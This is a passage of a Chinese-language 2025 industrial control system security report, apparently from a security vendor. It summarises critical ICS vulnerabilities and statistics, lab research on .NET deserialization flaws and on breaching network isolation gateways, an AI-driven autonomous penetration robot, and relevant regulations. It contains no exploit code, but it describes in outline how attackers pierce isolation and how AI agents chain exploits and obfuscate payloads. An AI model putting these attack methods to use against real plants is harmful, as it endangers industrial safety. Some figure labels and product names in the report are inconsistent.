# 三、2025工业控制系统的安全漏洞分布 # 1、工业控制系统重点漏洞 工业控制系统安全漏洞一直是工业企业面临的主要安全隐患,尤其是危害等级较高的漏洞,这些漏洞如果具备较高的易用性,会给工业企业带来更严重的危害。另一方面,尽管有些漏洞早已被官方披露并发布了相应的补丁,由于工业控制系统的特殊性,很多系统并未对系统及时更新补丁,导致已知漏洞长期暴露,持续面临可预见的安全威胁。我们对2025年危害较大的工业控制系统安全漏洞和在2025年被攻击者用于实际攻击事件的漏洞进行了梳理。 # (1)CVE-2025-0411 由于7-Zip常被安装于高权限的工程师站或服务器上,一旦漏洞被触发,攻击者不仅能获得当前系统的控制权,还能绕过操作系统的核心防御层,将恶意载荷无感知地投递到受信任的内部网络中,成为勒索软件或APT组织窃取敏感数据的隐蔽入口。 CVE-2025-0411 漏洞可以绕过“网络标记”保护机制。此漏洞允许远程攻击者绕过受影响的 7-Zip 版本中的“网络标记”(Mark-of-the-Web)保护机制。利用此漏洞需要用户交互,即目标用户必须访问恶意网页或打开恶意文件。具体缺陷存在于对压缩文件的处理过程中。当从带有“网络标记”的特制压缩文件中提取文件时,7-Zip 不会将“网络标记”传播到提取的文件。攻击者可以利用此漏洞在当前用户的权限下执行任意代码。 表 2 CVE-2025-0411 漏洞详情 <table><tr><td>漏洞类型</td><td>保护机制失效</td></tr><tr><td>CVSS v3</td><td>7.0</td></tr><tr><td>利用效果</td><td>任意代码执行</td></tr><tr><td>供应商</td><td>7-zip</td></tr><tr><td>受影响产品</td><td>7-zip</td></tr></table> 该漏洞被攻击者利用来部署 SmokeLoader 恶意软件,用于针对乌克兰组织的网络间谍活动,攻击范围包括政府实体、电气设备和电子产品制造商和供水公司 等。 # (2)CVE-2025-0282 Ivanti Connect Secure,以前称为 Pulse Connect Secure,是一款广泛应用于各行业企业(包括工业企业)的 SSL VPN 解决方案,用于提供安全的远程访问。它允许远程用户通过一个安全的通道访问企业资源,确保数据在传输过程中的加密和安全。Ivanti Connect Secure 是由 Pulse Secure 公司开发的,该公司后来被 Ivanti 收购,因此产品名称发生了变化。Ivanti Policy Secure 则是一个网络访问控制(NAC)解决方案。Ivanti Neurons for ZTA gateways 是用于实现零信任访问的网关设备,通过动态验证和授权来保护网络资产。 CVE-2025-0282 漏洞存在于 Ivanti Connect Secure、Policy Secure 和 ZTA 网关中,是基于栈的缓冲区溢出漏洞,未经身份验证的远程攻击者可以在受影响的设备上实现远程代码执行。 表 3 CVE-2025-0282 漏洞详情 <table><tr><td>漏洞类型</td><td>栈溢出漏洞</td></tr><tr><td>CVSS v3</td><td>9.0</td></tr><tr><td>利用效果</td><td>远程代码执行</td></tr><tr><td>供应商</td><td>Ivanti</td></tr><tr><td>受影响产品</td><td>Ivanti Connect Secure、Policy Secure 和 ZTA 网关</td></tr></table> 据 Ivanti 表示,由于 CVE-2025-0282 漏洞的存在,“有限数量”客户的 Ivanti Connect Secure 设备已被利用。该公司指出:“完整性检查工具(ICT)在事件发生的当天就识别出了威胁行为者的活动,使 Ivanti 能够及时做出反应并迅速开发出修复程序。” # (3) CVE-2025-24480 FactoryTalk View SE 是美国罗克韦尔(Rockwell Automation)公司的一款人机交互软件(HMI)。由于 FactoryTalk View SE 产品在处理输入数据时缺乏正确的清洗,未经身份验证的远程攻击者可以利用该漏洞以高权限在系统上执行任意命令或代码。最终,攻击者可完全接管 HMI 服务器,篡改生产指令或窃取敏感数据。 表 4 CVE-2025-24480 漏洞详情 <table><tr><td>漏洞类型</td><td>命令注入</td></tr><tr><td>CVSS v4</td><td>9.3</td></tr><tr><td>利用效果</td><td>远程代码执行</td></tr><tr><td>供应商</td><td>Rockwell Automation</td></tr><tr><td>受影响产品</td><td>FactoryTalk View ME: All versions prior to 15.0</td></tr></table> 该漏洞的利用对应 ATT&CK 框架的 TA0001 初始访问阶段,T1190 针对对外开放的服务的漏洞利用。攻击者通过该漏洞可以获取工业企业系统的访问权限,执行特定的命令等操作。 # (4) CVE-2025-3699 该漏洞影响三菱电机公司多个版本的供暖、通风和空调(HVAC)系统,成功利用此漏洞可能使攻击者绕过身份验证,从而未经授权控制空调系统或访问系统中存储的敏感信息。此外,攻击者还可能利用泄露的敏感信息篡改受影响产品的固件。攻击者利用该漏洞可以给数据中心等对温度敏感的关键设施带来威胁。 表 5 CVE-2025-3699 漏洞详情 <table><tr><td>漏洞类型</td><td>关键功能缺乏认证</td></tr><tr><td>CVSS v3</td><td>9.8</td></tr><tr><td>利用效果</td><td>绕过认证接管系统控制权限</td></tr><tr><td>供应商</td><td>Mitsubishi</td></tr><tr><td>受影响产品</td><td>Air conditioning systems G-50、GB-50等</td></tr></table> 该漏洞的利用对应 ATT&CK 框架的 TA0006 凭据访问阶段,T1212 利用漏洞对关键功能进行身份验证绕过。攻击者该漏洞绕过认证后可以接管系统权限,进而对系统进行非法操作或者篡改系统的固件,影响企业的资产安全。 # (5) CVE-2025-2523 霍尼韦尔 Experion PKS 和 OneWireless WDM 的控制数据访问(CDA)组件中存在整数下溢漏洞。攻击者可能利用此漏洞,导致通信通道被篡改,进而导致减法运算失败,最终可能实现远程代码执行。 <table><tr><td>漏洞类型</td><td>整数溢出</td></tr><tr><td>CVSS v3</td><td>9.4</td></tr><tr><td>利用效果</td><td>任意代码执行</td></tr><tr><td>供应商</td><td>霍尼韦尔</td></tr><tr><td>受影响产品</td><td>Experion PKS 版本范围为 520.1 至 520.2 TCU9 和 530 至 530 TCU3</td></tr></table> 该漏洞的利用对应ATT&CK框架的TA0008阶段,T1210针对远程服务的漏洞利用。攻击者通过该漏洞可以在工业企业的内部进行横向移动,渗透进入企业的生产网络,为攻击者后续寻找高价值目标提供了支持。 # (6) CVE-2025-52579 艾默生Valvelink产品会将敏感信息以明文形式存储在内存中。如果产品崩溃,或者程序员在释放内存之前未正确清除内存,则敏感信息可能会被保存到磁盘、存储在核心转储文件中,或者保持未清除状态。ValveLink用于控制阀门定位器,漏洞可能导致攻击者获取阀门控制权限,对化工或油气管道造成物理安全风险。 表 7 CVE-2025-52579 漏洞详情 <table><tr><td>漏洞类型</td><td>内存中明文存储敏感信息</td></tr><tr><td>CVSS v4</td><td>9.3</td></tr><tr><td>利用效果</td><td>获取核心转储或磁盘中未清除的敏感凭据</td></tr><tr><td>供应商</td><td>艾默生</td></tr><tr><td>受影响产品</td><td>ValveLink</td></tr></table> 该漏洞的利用对应ATT&CK框架的TA0006凭据访问阶段,T1552未加密凭据。攻击者通过该漏洞可以在工业企业的内部从不安全的位置(如内存)中搜寻受损的凭据,扩大资产控制的范围,为攻击者后续寻找高价值目标提供了支持。 # 2、工业控制系统漏洞统计分析 工控系统面临的主要威胁源于其自身的安全漏洞,尤其是具有极强穿透力的Oday漏洞,常规防护手段面对掌握此类漏洞的攻击者往往失效。这使得工控漏 洞研究显得尤为紧迫和重要。基于这一背景,我们从四个具体维度出发,对2025年工业控制系统的漏洞状况进行了全面的统计梳理。 # (1)漏洞的类型和数量 我们首先基于CVE的编号统计了自2016年至2025年十年间工业控制系统相关的漏洞情况,对其中涉及到主流控制器设计制造商相关的漏洞进行了分析统计,得到了工业控制系统漏洞的分布趋势。 2016-2025年主要工控系统厂商漏洞趋势图 图20主要工业控制系统厂商漏洞趋势 注:统计的厂商包括西门子、罗克韦尔、施耐德、ABB、艾默生、欧姆龙、GE、霍尼韦尔、日立、三菱、Delta Electronics和Horner Automation 从图中的走势可以看出,从2022年到2025年的四年时间里,主流工业控制系统厂商的漏洞总数呈现微弱的下降趋势,但总体始终维持在一个较高的位置。 图21主要工业控制系统漏洞类型统计 针对主流工业控制系统厂商在2025年公布的漏洞类型进行分析,可以看到,其中缓冲区溢出和SQL注入类型的漏洞占据了绝大部分,其次是输入权限管理不当、认证不当和缓冲区溢出类型的漏洞。从这些漏洞的类型可以看出,IT系统中严重影响系统安全的漏洞也同样适用于工业控制系统。 # (2) 漏洞的厂商分布 在分析了主要工业控制系统厂商漏洞总数和类型的基础上,我们进一步分析了各个主要厂商的漏洞数量情况,具体见下图。从图中可以看出,西门子、罗克韦尔和施耐德三家公司产品的漏洞数量位列前三,其中西门子公司的漏洞数量更是远超排在第二位的罗克韦尔。 2025年主要工控系统厂商漏洞数量 图22 2025年主要厂商漏洞数量统计 同时,我们还统计了从2023年到2025年这3年的时间内,各个公司的CVE漏洞数量的状况,从统计的结果可以看出,大部分企业的漏洞数量都有所降低,但也有部分企业的漏洞数量逐年增高。这可能与工业控制系统安全研究的门槛较高,导致针对漏洞的研究和挖掘不够充分,使得每年漏洞的数量波动较大。 2023-2025年主要工控系统厂商漏洞数量 图23主要工业控制系统厂商CVE漏洞变化趋势 # (3)漏洞的危害统计 鉴于工业控制系统对于攻击行为的敏感性,任何针对工业控制系统的成功攻击都有可能带来严重的后果,如影响企业的正常生产活动,甚至引发火灾、爆炸等事故;我们基于工业控制系统CVE漏洞通报,统计了2025年漏洞的危害等级分布。 2025年ICS漏洞危害级别统计 图242024年CVE工业控制系统漏洞危害级别统计 critical high medium low 从统计结果可以看到,绝大多数的工业控制系统漏洞的危害级别都很高。在这些漏洞中,危害等级为critical的漏洞占比为 $13\%$ ,危害等级为high的漏洞占比为 $42\%$ ,这两种类型的漏洞占据了 $55\%$ 的比例,相比2024年的 $77\%$ 有所下降,但仍然占据了超过一半的比例。从侧面反映出工业控制系统漏洞对工业企业的潜在影响巨大。 另一方面,我们针对各个厂商在2025年的漏洞危害分布进行了统计,从结果可以看出,工业控制系统漏洞的危害程度在各个厂商中以危害程度为中高危的居多。 2025年主要工控系统厂商漏洞危害统计 图25 2024年主要工业控制系统厂商CVE漏洞危害统计 # (4)漏洞的产品分布 基于2025年的CVE漏洞通报数据,我们统计了这些漏洞和对应的工业控制系统产品,得到了如下图所示的结果。从图中可以看出,工业控制系统的安全漏洞在网络系统和系统管理中的占比较高;其次是PLC和SCADA。 由此可以看出,网络系统、系统管理和PLC的安全漏洞依然是威胁工业控制系统安全的重要因素,这与网络系统是工业控制系统对外暴露接口的主要途径有关,同时也与PLC涉及的大类和型号以及品牌厂商众多有着直接联系。 2025 ICS漏洞产品分布 图26 ICS漏洞产品分布 # 四、2025极星工控安全实验室研究 2025年,极星工控安全实验室以工业控制系统为核心研究对象,立足攻击者视角,聚焦工控系统中广泛使用的网络隔离设备——“网闸”,开展深入的安全攻防研究。同时,实验室将人工智能技术应用于网络攻击模拟领域,以渗透机器人为切入点,探索AI驱动的自动化模拟测试技术,推动工控系统安全评估向智能化、动态化方向发展。 # 1、工业软件通用组件发现系列高危漏洞 一些编程语言的特性由于设计上的缺陷,如C#中的BinaryFormatter类中的反序列化机制,给攻击者带来了巨大的便利。攻击者通过挖掘编程语言中的这些设计缺陷,并积极寻找该缺陷覆盖的目标厂商的产品,极大地扩展了攻击的破坏半径。 # (1) 漏洞原理简介 .NET Remoting 是一个用于跨应用程序域或网络通信的框架,它可以让客户端应用程序访问和调用服务器端应用程序中的对象。.NET Remoting 是基于 .NET Framework 的 SystemRuntime.Remoting 命名空间及其子命名空间提供的类和接口实现的。该框架支持 TCP、HTTP 等多种通信协议,并可通过配置实现安全、日志等功能。 所有使用.NET Remoting跨越应用程序域的本地对象都必须按数值来传递,并且应该用[serializable]自定义属性作标记,否则它们必须实现ISerializable接口。对象作为参数传递时,框架将该对象序列化并传输到目标应用程序域,对象将在该目标应用程序域中被重新构造。无法序列化的本地对象将不能传递到其他应用程序域中,因而也不能远程处理。 然而,微软在官方文档中已经明确指明.NET Remoting中的反序列化存在安全漏洞,现在已经将.NET Remoting弃用,并推荐使用WCF。为了缓解.NET Remoting中的反序列化漏洞,微软还将.NET Framework Remoting反序列化级别分成Low和High,限制用户可反序列化的类型,以降低反序列化漏洞带来的危害。尽管如此,我们在研究中发现,默认权限为Low的配置,可以通过一定的技 术手段绕过,从而实现权限为High的反序列化过程,最终达到远程代码执行的效果。 # Automatic Deserialization in .NET Framework Remoting Article $\cdot$ 12/08/2009 In this article Setting the Deserialization Level Programmatically Setting the Deserialization Level Using an Application Configuration File See Also This topic is specific to a legacy technology that is retained for backward compatibility with existing applications and is not recommended for new development. Distributed applications should now be developed using the Windows Communication Foundation (WCF). Remoting systems that rely on run-time type validation must deserialization a remote stream to begin using it and an unauthorized client might try to exploit the moment of deserialization. To help protect against this type of attack, .NET Framework remoting provides two levels of automatic deserialization, Low and Full. Low, the default value, protects against deserialization attacks by deserialization only the types associated with the most basic remoting functionality, such as automatic deserialization of remoting infrastructure types, a limited set of system-implemented types, and a basic set of custom types. The Full deserialization level supports automatic deserialization of all types that remoting supports in all situations. 图27 微软官方文档 尽管微软已经将.NET Remoting标记为不安全的,并提醒开发者在使用时需要充分考虑其安全风险,并引入相应的安全措施加以防范。我们在研究工业控制系统的上位机软件时,依然发现许多软件不规范地使用该通信框架,给系统带来了安全漏洞。 表 8 .NET Remoting 中 BinaryFormatter 导致的反序列化漏洞 <table><tr><td>漏洞编号</td><td>软件名称</td><td>所属厂商</td><td>版本</td><td>危害</td></tr><tr><td>CNNVD-2025-60136449</td><td>博途TIA</td><td>西门子</td><td>V19</td><td>中危</td></tr><tr><td>CNNVD-2025-15654075</td><td>Energy Manager</td><td>西门子</td><td>V7.5</td><td>高危</td></tr><tr><td>CNNVD-2024-52007946</td><td>EcoStruxure PME</td><td>施耐德</td><td>2023</td><td>高危</td></tr><tr><td>CNNVD-2024-52629060</td><td>DeltaV</td><td>艾默生</td><td>R6</td><td>高危</td></tr><tr><td>CNNVD-2025-22994096</td><td>EPKS</td><td>霍尼韦尔</td><td>R511</td><td>高危</td></tr><tr><td>CNNVD-2025-57784139</td><td>FactoryTalk View</td><td>罗克韦尔</td><td>10.00.00</td><td>高危</td></tr><tr><td>CNNVD-2025-58559205</td><td>Proficy Machine Edition</td><td>GE</td><td>V9.5</td><td>高危</td></tr></table> 这些漏洞都是由于在.NET Remoting中使用了BinaryFormatter来进行反序列化时导致的。BinaryFormatter类是微软在反序列化漏洞成为业界熟知的安全 漏洞模型之前实现的,因此并没有遵循最佳的安全策略。导致其中的BinaryFormatter.Deserialization方法存在反序列化漏洞,攻击者可以构造恶意对象,序列化后发送到目标系统,在目标系统使用该方法进行反序列化时触发漏洞,可以实现远程代码执行。 Learn / .NET / # Deserialization risks in use of BinaryFormatter and related types Article $\cdot$ 08/08/2024 $\cdot$ 8 contributors 图28 BinaryFormatter反序列化存在安全漏洞 This article applies to the following .NET implementations: - .NET Framework all versions .NET Core 2.1 - 3.1 .NET 5 and later Caution The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. BinaryFormatter is insecure and can't be made secure. # (2) 漏洞利用效能分析 尽管 BinaryFormatter存在着反序列化漏洞,微软.NET团队将此归结为一种设计,而不是漏洞,因此拒绝为该问题提供安全更新补丁。而是将使用BinaryFormatter时的安全风险评估等工作留给开发者,让开发者充分评估其在开发中使用BinaryFormatter的场景,并为此提供相应的过滤清洗反序列化数据的措施。同时,开发者还要自己评估使用该类时潜在的安全风险。在此情况下,开发者的不规范编码极有可能引入安全漏洞。 从以上发现的漏洞产品分布可以看出,当攻击者针对编程语言相关的通用系统进行漏洞利用时,其影响范围将不限于具体的厂商,能够覆盖较大的目标产品,给工业企业的安全带来威胁。 # 2、工业控制系统“最强”隔离措施网闸发现系列高危漏洞 工业控制系统中的网络长期以来依赖严格的物理隔离作为保障信息安全的核心屏障。在传统的架构中,OT网络与外部互联网及企业IT网络在物理上完全 断开,这种封闭性曾有效地构建了一个隔离环境,将绝大多数外部网络威胁阻挡在外。 然而,随着工业化与信息化(两化)融合的深入推进,以及智能制造对实时数据交互需求的爆发,绝对的物理隔离已难以适应现代工业生产的效率要求。工业网络边界正逐渐从封闭的物理隔离向受控的逻辑隔离演进,防火墙、工业网闸(GAP)、VPN网关等边界防护设备取代了物理断点,成为连接OT与IT域的关键枢纽。 这种互联互通在打通数据孤岛的同时,也极大地拓展了攻击面。作为内外网交互枢纽的网关、防火墙等网络设备,本身集成了复杂的协议栈与管理功能,反而从单纯的防御设施转变为攻击者眼中的高价值突破口。攻击者无需再寻求物理接触,而是专注于挖掘这些边界设备的固件漏洞(如堆栈溢出、认证绕过等),试图以此为跳板突破防线,将外部威胁直接引入工业控制核心区。这一架构性的变迁,使得针对边界网络设备的漏洞利用成为了当前工控系统面临的一种关键且高发的攻击方式。 我们以国内主流网闸作为主要研究对象,验证了针对工业控制系统中网络设备的攻击效能。 图29 网闸攻击面 # (1)工控网闸安全分析 我们以工业控制系统中的网络拓扑结构为背景,系统性地研究了在网闸隔离 架构下仍可能被攻击者利用的穿透路径与攻击手段。研究聚焦于网闸在实际部署中承担的数据交互、文件同步、远程运维等功能模块,围绕运维、系统、固件三个关键层面开展系统性安全研究。 研究结果表明,当前国内主流工业网闸产品在设计与实现方面普遍存在以下安全短板: 1. 隔离机制不完善:尽管宣传的时候是使用隔离卡物理隔离,但是在实际分析中发现,网闸还是使用双网卡机制,不存在隔离卡以及物理隔离。 2. 默认口令:根据这次网闸测试,发现网闸存在 web 默认口令,服务默认密码,隐藏账户等,且在初次登录之后不会进行强制更改。 3. 权限模型不合理:核心服务多以 root/System 权限运行,权限过高,未实施“最小权限原则”。 在对网闸穿透能力的实证研究中,我们深入分析了四款国内主流网闸设备的系统服务、进程架构、网络配置等,发现它们普遍采用双网卡结构进行上下层网络的中继与调度,未引入隔离卡或其他具备物理断连能力的安全设计。这种结构虽然在逻辑上进行了隔离,但本质上依赖于系统级别的访问控制,存在被突破的可能。我们通过上层网闸服务器获取高权限后,直接控制其双网卡中的下层接口,从而访问并操作下层网闸服务器,再进一步渗透至下层业务网络,实现逻辑隔离的突破与跨网段攻击,达到了完整的网闸隔离穿透效果。 # (2)工控网闸攻击效能分析 针对网闸(GAP)的攻击效能分析显示,尽管此类设备通过阻断TCP/IP链接构建了高强度的逻辑隔离,但其作为软硬件结合体,仍存在特定的攻防效能突破口。 从攻击可行性来看,网闸的效能短板主要集中在隔离机制与权限模型上。攻击者往往针对网闸特有的私有协议封装或文件交换模块,利用精心构造的畸形数据包触发缓冲区溢出,实现穿透隔离的远程代码执行;或针对其Web管理端挖掘高权限漏洞,直接接管设备权限。 从战术效能来看,针对网闸的攻击具有“高门槛、高收益”的特征。虽然开发针对性漏洞利用的难度高于普通防火墙,但一旦攻击成功,其效能是毁灭性的。 它标志着工业网络最核心的隔离信任模型崩塌,攻击者能够借此建立隐蔽的跨网C2通道,使原本被视为绝对安全的OT核心区完全暴露在外部威胁之下。 # 3、AI&渗透测试,自动渗透机器人前瞻性技术研究 近一年来,得益于基础模型能力的质变,LLM在推理与编程等领域的表现突飞猛进,各类垂直领域智能体(Agent)应用应运而生。在网络安全领域,攻击者也越来越多地使用AI作为辅助,提升攻击效率。从公开报道到专业分析均证实,利用AI实施深度伪造、辅助恶意代码编写、自动化漏洞利用及生成欺骗性钓鱼邮件的案例正急剧增长。AI工具的普及实质性地打破了复杂的攻击壁垒,让攻击者在效率、隐匿度与规模化运作方面获得了显著的非对称优势。 基于人工智能的攻击行为对企业的信息安全构成了严峻挑战。传统的安全防护措施往往侧重于被动防御,难以有效应对新兴的安全威胁。为了弥补这一不足,极星工控安全实验室研发了一款能够主动探测和评估网络安全状况的产品—智能渗透机器人。从攻击者的角度,对工业企业的系统环境进行全面的攻击测试,帮助企业提前发现潜在的威胁。 2025年实验室基于AI&渗透测试开展技术性研究,已形成了一套可自主开展网络渗透的渗透评估机器人。 # 渗透测试机器人(PT_BOT) 网络风险评估助手(RA.Bot) 图30智能渗透机器人主要特性 # (1)攻击方式简介 智能渗透机器人不再仅仅是执行预定义的脚本,而是利用大语言模型(如GPT-4o,Llama-3等)进行复杂的逻辑推理。 自主规划与分解:机器人会利用思维链技术,将一个宏大的攻击目标(如,获取域管理员权限)自动分解为数个子任务,包括侦察、漏洞扫描、漏洞利用和提权。 动态环境适应:智能渗透机器人能够根据每一步的反馈(例如Nmap扫描结果或报错信息)实时调整策略。如果一种漏洞利用失败,它会像人类一样分析错误原因,尝试变体或切换到另一种攻击方式。 利用结构化知识库:智能渗透机器人还结合了MITRE ATT&CK框架生成的攻击树,确保攻击路径符合专业的红队战术标准,减少“幻觉”或无效操作。 # (2)攻击效能分析 基于人工智能的自动渗透测试通过引入大语言模型与智能体技术,实现了从“自动化”向“智能化”的效能跃升。 在效率方面,AI智能体能够全天候并行执行资产测绘与漏洞挖掘,将传统长达数周的渗透周期缩短至数小时。在深度与精度上,区别于基于规则的传统扫描器,AI具备逻辑推理能力,能根据目标反馈实时调整攻击路径,自动组合多步利用链以突破复杂防御。此外,在隐蔽性方面,AI能动态生成具有高混淆性的异构攻击载荷,有效绕过WAF等边界防护。尽管在处理深层业务逻辑漏洞上仍需人工辅助,但AI自动渗透已显著提升了规模化攻击的成功率与覆盖面,成为重塑攻防不对称态势的关键力量。 # 五、国利网安1321多域立体工控安全智能解决方案 针对工业控制系统防御中面临的一系列行业痛点,国利网安发布1321多域立体工控安全智能解决方案,该方案深刻理解智能工业对业务连续性、防护可靠性、决策可解释性的更高要求,率先将人工智能安全能力深度植入工业防护核心,重新定义工业安全范式,同时多维度保障工控系统安全,从空间维度做到系统设备资产全覆盖,从使用维度做到运维、威胁、资产的日常监管全覆盖,从防攻击维度做到攻击的全生命周期阻断全覆盖,确保让工控系统看得见、管得牢、防得住。 “1321”工控安全解决方案并非产品的简单堆砌,而是一个有机协同、纵深 防御的智能体系,通过“1脑-3管-2专-1哨”的架构设计,实现从工控系统智能中枢到末端恢复能力的全链条覆盖。1脑是决策核心,由拟化不同专业角色的AI智能体协同工作构成,形成“虚拟安全专家团队”;3管是在一线落地的执行单元,实现资产动态画像、威胁智能研判与运维流程自动化;2专是可靠封锁,针对不同网络区域的核心对象提供专属安全保障;1哨是韧性保障,确保核心系统在极端情况下可监测、可恢复、可自愈。 在战略层面,它将安全深度融入工业企业生产流程,为智能化升级提供可信保障;在运营层面,它通过自动化与智能化极大提升安全运维效率,降低对稀缺专业人才的依赖;在技术层面,它实现了从IT到OT、从中心到边缘的全域覆盖,为企业的每一个业务环节提供确定性的安全防护。 “1321”工控安全解决方案,构建可知、可防、可控的工业安全新格局,以体系化防护能力破解工业安全碎片化困境,助力企业规避生产中断、数据泄露等重大风险,保障生产连续、安全;同时,其智能化、纵深防御的核心逻辑,更推动工业安全从被动防御向主动预判、精准管控升级,为工业数字化转型扫清安全障碍,赋能产业高质量发展,能够真正做到:核心数据不出事、生产网络穿不透、边缘站场不失守、控制指令不乱发、生产业务不中断。以体系化的力量,捍卫工控系统的现在与未来。 图31 1321工控安全解决方案架构 # 六、2025年工业控制系统安全相关政策法规 工业企业面临的安全威胁日益严重,为了应对这些威胁,政府采取“立改并重”的策略,一方面结合安全新势态加速出台前沿法律法规,另一方面持续对既有法律体系进行修订与完善,以规范工业企业在日常生产经营中的行为,保障工业企业的网络安全。工业企业应以这些重要的法律法规为依据,构建自身的安全防御体系,降低企业的安全风险,以下是2025年与工业控制系统安全相关的重要法律法规。 # 1、《中华人民共和国网络安全法》(2025修正版) 2025年10月28日十四届全国人大常委会第十八次会议表决通过关于修改网络安全法的决定,自2026年1月1日起施行。时隔八年,《中华人民共和国网络安全法》迎来了首次实质性“大修”。此次修订直面技术变革带来的复杂挑战,旨在填补新形势下的安全空白,通过构建更严密的法律防线,为我国从“网络大国”迈向“网络强国”提供强有力的制度护航。 # 大幅提升违法处罚力度 此次修订重点对第六十一条等三个关键条款进行了“整合”与“加码”。在显著提高违法成本、拉紧法律高压线的同时,新法构建了层层递进的梯度处罚标准。这种区分不同后果严重程度的差异化处罚策略,不仅提升了法律威慑力,也极大增强了执法的系统性。 # 前瞻布局人工智能治理 首次将人工智能安全写入基础法。明确了人工智能技术研发、服务提供者的安全评估义务,要求防止利用人工智能技术进行网络攻击或生成虚假信息,填补了生成式人工智能爆发后的法律空白。 # 完善关键信息基础设施保护制度 此次修订通过第六十三条,针对网络关键设备和网络安全专用产品“带病入市”问题。新法明确划定红线:凡销售未经安全认证的专用产品,将面临最高五倍违法所得的罚款及行政许可的剥夺。这一规定旨在从硬件源头掐断风险,堵住供应链漏洞。同时,立法者通过精准把握处罚尺度,既严防安全底线失守,又避 免过度设限阻碍技术迭代,从而推动数字经济在安全与发展的双轮驱动下稳健前行。 # 2、《网络关键设备安全技术要求 可编程逻辑控制器(PLC)》 2025年3月28日由国家市场监督管理总局和国家标准化管理委员会联合发布,于2025年10月1日正式实施。该标准进一步落实了《中华人民共和国网络安全法》第二十三条中关于“网络关键设备和网络安全专用产品应当按照相关国家标准的强制性要求,由具备资格的机构安全认证合格或者安全检测符合要求后,方可销售或者提供”的具体要求,通过统一的安全基准,提升了PLC设备的抗攻击能力,降低工业控制系统被入侵或破坏的风险,对保障电力、制造等关键行业的基础设施稳定运行具有重要指导意义。 # 3、《国家网络安全事件报告管理办法》 2025年9月15日由国家互联网信息办公室发布的《国家网络安全事件报告管理办法》,旨在规范网络安全事件的报告,明确了报告主体(网络运营者、个人等)、流程、时限和内容,以快速控制损失,保障国家网络安全。对特别重大网络安全事件(如关键信息基础设施长时间中断、大规模数据泄露、重要网站被攻击篡改等)有明确界定标准,它将网络安全事件的报告制度化、规范化,是国家网络安全治理体系的重要组成部分。有助于及时响应,防止事态扩大,保护国家安全、社会秩序和公民合法权益。 # 4、《工业领域数据安全风险评估规范》 2025年4月10日由中国通信标准化协会发布的《工业领域数据安全风险评估规范》,规定了工业领域数据安全风险评估的基本原则、要素、流程及方法,适用于工业领域重要数据和核心数据处理者在中华人民共和国境内开展数据处理活动的数据安全风险评估,也可用于指导工业领域一般数据处理者对其数据处理活动的数据安全风险评估。 《评估规范》主要适用于工业领域重要数据和核心数据处理者在中国境内开展数据处理活动的数据安全风险评估,一般数据的工业领域处理者也可以参照执行该文件。工业企业应当先依据《识别指南》判断自身是否属于重要数据或核心数据处理者,再适用该文件。 根据《评估规范》,工业领域数据评估分为两大板块,分别是合规性评估和安全风险评估。前者判断数据处理活动本身是否合规,后者则指在数据处理活动过程中进行风险识别、分析、评价的过程。 在合规性评估的评估要点中,《评估规范》特别指出针对重要数据和核心数据,工业领域数据处理者应当每年至少展开一次定期评估,并向本地区行业监管部门报送评估报告。而在发生收购或资产剥离、重大流程或系统变更、或涉及数据迁移、数据出境、数据提供、委托处理等过程前,则会触发额外的数据安全风险评估工作。 安全风险评估应当在重要数据和核心数据处理者在完成合规性评估后进行。风险安全等级可分为极高、高、中、低,数据处理者应当根据风险评估结果编制形成《工业领域数据安全风险评估报告》,并相应采取风险缓释措施。 # 5、《2025年工业和信息化标准工作要点》 2025年3月31日由工业和信息化部办公厅发布,《工作要点》以推进新型工业化、建设制造强国和网络强国为核心,全面部署2025年工业和信息化标准化工作。总体要求坚持标准与产业发展战略、规划、政策的深度协同,重点强化传统产业、新兴产业及未来产业的标准供给,构建高质量发展的标准体系。 在关键领域,工作要点明确了深化制造业数字化转型、网络化协同及智能化赋能的标准建设路径,涵盖工业互联网、人工智能、算力基础设施等前沿方向。同时,强调以标准推动绿色低碳发展,完善碳管理、绿色制造及资源循环利用标准体系。 为筑牢安全底线,文件提出编制强制性国家标准体系建设指南,加快重点产品安全标准制定。此外,通过深度参与国际标准制定及提升国内外标准一致性,致力促进产业全球化发展,并从全生命周期管理、组织建设、平台服务及人才培养等多维度提升行业治理现代化水平。 # 6、《网络安全技术 信息安全管理体系 要求》 2025年6月30日由国家市场监督管理总局和国家标准化管理委员会发布,本标准提供建立、实现、维护和持续改进信息安全管理体系的要求。采用信息安全管理体系是组织的一项战略性决策。信息安全管理体系通过应用风险管理过程 来保持信息的保密性、完整性和可用性,并为相关方树立风险得到充分管理的信心。重要的是,信息安全管理体系是组织的过程和整体管理结构的一部分并集成在其中,并且在过程、信息系统和控制的设计中要考虑到信息安全。期望的是,信息安全管理体系的实现程度要与组织的需要相符合。 # 让控制更安全 让用户更放心 # Make control securer – Make concern fewer 浙江国利网安科技有限公司 联系电话:0574-87288727 企业官网:www.guolisec.com 企业邮箱:guolisec@guolisec.com 公司地址:宁波市海曙区甬水桥科创中心1号楼A座5层